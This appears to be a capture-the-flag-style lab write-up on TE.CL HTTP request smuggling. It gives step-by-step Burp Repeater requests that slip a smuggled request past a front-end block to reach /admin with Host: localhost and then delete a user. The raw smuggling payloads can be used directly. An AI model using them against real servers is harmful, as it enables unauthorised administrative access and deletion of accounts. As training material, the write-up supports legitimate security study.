Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Description

This lab involves a front-end and back-end server, and the back-end server doesn’t support chunked encoding. There’s an admin panel at /admin, but the front-end server blocks access to it.

Reproduction and proof of concept

  1. Try to visit /admin and observe that the request is blocked.

  2. In Burp Suite, go to the Repeater menu and ensure that the “Update Content-Length” option is unchecked.

  3. Using Burp Repeater, issue the following request twice:

POST / HTTP/1.1
Host: lab-id.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

60
POST /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

  1. Observe that the merged request to /admin was rejected due to not using the header Host: localhost.

  2. Issue the following request twice:

POST / HTTP/1.1
Host: lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

  1. Observe that you can now access the admin panel.

  2. Using the previous response as a reference, change the smuggled request URL to delete the user carlos:

POST / HTTP/1.1
Host: lab-id.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

Exploitability

An attacker will need to smuggle HTTP requests to access the /admin page, then delete a user.